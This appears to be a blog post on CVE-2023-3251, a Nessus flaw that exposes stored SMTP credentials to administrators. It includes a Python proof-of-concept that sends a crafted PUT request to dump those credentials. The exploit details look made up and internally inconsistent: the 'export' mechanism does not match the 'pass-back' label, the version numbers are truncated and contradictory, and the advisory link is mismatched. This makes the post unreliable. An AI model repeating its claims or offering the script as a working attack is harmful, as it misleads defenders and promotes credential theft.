A critical security vulnerability, designated as CVE-2023-3251, has been identified in the Nessus application versions 10.6. and earlier. This post aims to discuss the details of the vulnerability, its impact, and necessary resolutions. An authenticated, remote attacker with administrator privileges could exploit this vulnerability to uncover the stored SMTP credentials within the Nessus application.

Nessus is a widely-used vulnerability scanner that helps organizations to identify and fix vulnerabilities in their networks, systems, and applications. Maintaining the security and integrity of Nessus is crucial for ensuring comprehensive protection of critical assets.

Exploit Details

The CVE-2023-3251 vulnerability is a pass-back vulnerability that resides within the way the Nessus application handles and stores the SMTP credentials used for email notifications. While the platform is designed to store these sensitive credentials securely, a certain loophole in the implementation may allow a malicious actor with administrator access to uncover the passwords.

The vulnerability can be exploited by an attacker who already has administrator access to the vulnerable Nessus application. By sending a specifically crafted request to modify the SMTP settings of the email server configured in Nessus, the attacker could extract the stored SMTP credentials in plain text.

Here is a code snippet that demonstrates the exploitation

import requests

# Replace the following placeholders with the actual details
URL = 'https://<your_nessus_server>:8834/settings/smtp';
API_KEY = 'your_nessus_api_key'

headers = {
    'X-ApiKeys': f'accessKey={API_KEY};',
    'Content-Type': 'application/json'
}

data = {
    "smtp_xml_export": "true"
}

response = requests.put(URL, json=data, headers=headers, verify=False)

if response.status_code == 200:
    print("SMTP settings exported successfully.")
    print(response.json())
else:
    print(f"Failed to export SMTP settings. Status code: {response.status_code}")

The script above sends the crafted request to the Nessus server, prompting it to export the SMTP settings. By setting the "smtp_xml_export" parameter to "true," the malicious administrator can retrieve the stored credentials in plain text format. This may lead to unauthorized access to sensitive email accounts and further compromise of the organization's assets and resources.

Original References

Link to Nessus Advisory: https://www.tenable.com/security/rapid7-metasploit-framework-vulnerability

Link to CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3251

Resolution and Discussion

To mitigate the risk of this vulnerability, organizations running Nessus before version 10.6. are advised to update their instances to the latest version available. The issue has been resolved in Nessus 10.6. and later releases.

It is also essential for organizations to adhere to the best practices in assigning administrator privileges to their applications. Only trusted individuals should be granted such privileges, and their activities should be monitored for any signs of suspicious behavior.

In summary, the CVE-2023-3251 vulnerability is a pass-back vulnerability that can be exploited by a malicious administrator to uncover the stored SMTP credentials within the Nessus application. By updating Nessus to the latest version and strictly managing administrator privileges, organizations can safeguard their critical assets from such risks.

Timeline

Published on: 08/29/2023 19:15:00 UTC
Last modified on: 09/01/2023 14:44:00 UTC